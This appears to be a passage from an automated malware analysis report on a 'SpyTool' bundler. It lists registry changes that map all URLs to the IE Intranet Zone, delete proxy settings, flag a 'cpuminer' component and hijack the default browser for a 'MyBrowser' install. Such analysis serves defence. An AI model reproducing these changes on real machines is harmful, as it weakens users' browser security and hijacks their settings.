[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process nsh37.tmp:1376 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg2E.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg2E.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi32.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi32.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx3B.tmp\Registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 A2 B5 C9 29 BD C4 88 C5 E9 1E B9 07 04 FE 74"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings so that all local web nodes with no dots in their name that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsc43.tmp:1632 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 26 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 4D 26 2E 69 43 4B 60 D6 5C A4 32 5B B9 88 FD"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings so that all local web nodes with no dots in their names that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nss2A.tmp:1600 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg2E.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg2E.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi32.tmp\Registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 74 AD 2C 4F 08 2B 47 80 50 2C 0C B2 0E 5D 75"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings so that all local web nodes with no dots in their names that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nss2A.tmp:228 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 BB 67 3E 82 2A A3 77 98 41 03 D6 50 51 16 52"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg2E.tmp\Registry.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"
The process gmsd_re_005010082.exe:436 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 2B D2 12 20 91 AD 7A EB 39 AC 49 3B 80 D7 07"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process tasklist.exe:1920 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 B1 EC 8A 24 C2 E5 D0 1F 7C 67 F6 82 EB AF C6"
The process tasklist.exe:1068 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 E8 0C 96 92 A9 9B 14 5E 6F 9C D1 5B 49 ED 51"
The process setup.exe:268 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"IconsVisible" = "1"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"Name" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationDescription" = "MyBrowser is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into MyBrowser."
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"
[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"UninstallArguments" = " --uninstall --system-level"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMinor" = "95"
[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayVersion" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationName" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallDate" = "20150907"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"
[HKCR\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"
[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg2E.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg2E.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi32.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi32.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx3B.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx3B.tmp\, , \??\%Program Files%\MyBrowser\MyBrowser,"
[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMajor" = "2171"
[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"irc" = "CRSBRWSHTML"
[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"
[HKCR\https\shell]
"(Default)" = "open"
[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\Startmenu]
"StartMenuInternet" = "MyBrowser"
[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\RegisteredApplications]
"MyBrowser" = "Software\Clients\StartMenuInternet\MyBrowser\Capabilities"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerError" = "0"
[HKCR\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerResult" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe --uninstall --system-level"
[HKCR\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"Path" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 C3 A0 46 5A 6F E2 F5 1C 1B 4B 67 AC 50 64 3E"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerExtraCode1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"
[HKCR\HTTP]
"URL Protocol" = ""
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCR\HTTP\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\MyBrowser\Installer]
"oopcrashes" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ReinstallCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --make-default-browser"
[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe"
[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap" = "-stage:preconditions"
[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoRepair" = "1"
[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\https]
"URL Protocol" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Publisher" = "The MyBrowser Authors"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Version" = "39.5.2171.95"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "MyBrowser"
[HKCR\CRSBRWSHTML]
"(Default)" = "MyBrowser HTML Document"
[HKLM\SOFTWARE\MyBrowser\Installer]
"pv" = "39.5.2171.95"
